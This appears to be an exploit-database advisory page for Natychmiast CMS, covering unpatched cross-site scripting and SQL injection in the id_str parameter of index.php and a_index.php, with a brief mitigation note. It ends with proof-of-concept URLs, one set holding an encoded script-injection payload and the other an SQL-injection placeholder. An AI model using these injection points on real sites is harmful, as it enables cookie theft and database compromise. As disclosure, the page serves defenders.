header-logo
Suggest Exploit
vendor:
Natychmiast CMS
by:
7.5
CVSS
HIGH
Cross-Site Scripting, SQL-Injection
79, 89
CWE
Product Name: Natychmiast CMS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Natychmiast CMS Multiple Cross-Site Scripting and SQL-Injection Vulnerabilities

The Natychmiast CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques to prevent cross-site scripting and SQL-injection attacks. Regularly updating the CMS software to the latest version and applying security patches is also advisable.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38561/info

Natychmiast CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?id_str=[SQLi]
http://www.example.com/a_index.php?id_str=[SQLi]
http://www.example.com/index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
http://www.example.com/a_index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E